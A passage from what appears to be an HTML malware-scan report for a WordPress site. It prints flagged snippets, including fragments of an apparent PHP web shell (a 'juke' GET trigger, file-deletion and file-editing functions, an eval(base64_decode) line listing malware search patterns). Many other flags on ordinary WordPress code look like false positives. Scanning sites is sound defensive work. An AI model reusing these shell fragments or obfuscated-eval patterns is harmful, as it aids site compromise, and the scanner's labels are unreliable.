</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_51").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 280.94 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 14:16:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 795</span><br><table id="file_52" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. </span><span style="color: #0000BB">$hash</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">check out</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int 1 when </span><span style="color: #007700">new </span><span style="color: #0000BB">day</span><span style="color: #007700">, </span><span style="color: #0000BB">0 </span><span style="color: #007700">if </span><span style="color: #0000BB">not a </span><span style="color: #007700">new </span><span style="color: #0000BB">day</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1017</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_new_day</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_datetime</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1021</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1023</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return new </span><span style="color: #0000BB">DateTimeImmutable</span><span style="color: #007700">( </span><span style="color: #DD0000">'now'</span><span style="color: #007700">, </span><span style="color: #0000BB">wp_timezone</span><span style="color: #007700">() );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1030</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">easily building url queries</span><span style="color: #007700">. </span><span style="color: #0000BB">It sets the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1036</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">http</span><span style="color: #007700">-</span><span style="color: #0000BB">build</span><span style="color: #007700">-</span><span style="color: #0000BB">query</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL</span><span style="color: #007700">-</span><span style="color: #0000BB">encoded string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1042</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">build_query</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_http_build_query</span><span style="color: #007700">( </span><span style="color: #0000BB">$data</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #DD0000">'&'</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The query string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_http_build_query</span><span style="color: #007700">( </span><span style="color: #0000BB">$data</span><span style="color: #007700">, </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$sep </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$urlencode </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #0000BB">$sep</span><span style="color: #007700">, </span><span style="color: #0000BB">$ret </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function; </span><span style="color: #0000BB">either a single key </span><span style="color: #007700">and </span><span style="color: #0000BB">value</span><span style="color: #007700">, or </span><span style="color: #0000BB">an associative </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">values</span><span style="color: #007700">:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of add_query_arg</span><span style="color: #007700">() </span><span style="color: #0000BB">is not escaped by </span><span style="color: #007700">default. </span><span style="color: #0000BB">Output should be</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">signature</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">New </span><span style="color: #0000BB">URL query string </span><span style="color: #007700">(</span><span style="color: #0000BB">unescaped</span><span style="color: #007700">).</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_query_arg</span><span style="color: #007700">( ...</span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of remove_query_arg</span><span style="color: #007700">() </span><span style="color: #0000BB">is not escaped by </span><span style="color: #007700">default. </span><span style="color: #0000BB">Output should be</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">New </span><span style="color: #0000BB">URL query string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_query_arg</span><span style="color: #007700">( </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$query </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$query</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">add_query_arg</span><span style="color: #007700">( </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$query </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string PHP timezone name </span><span style="color: #007700">or </span><span style="color: #0000BB">a ±HH</span><span style="color: #007700">:</span><span style="color: #0000BB">MM offset</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">array </span><span style="color: #0000BB">of single</span><span style="color: #007700">-use </span><span style="color: #0000BB">query variable names that can be removed from a URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] </span><span style="color: #0000BB">An </span><span style="color: #007700">array </span><span style="color: #0000BB">of query variable names to remove from the URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_removable_query_args</span><span style="color: #007700">() {</span>
</span>
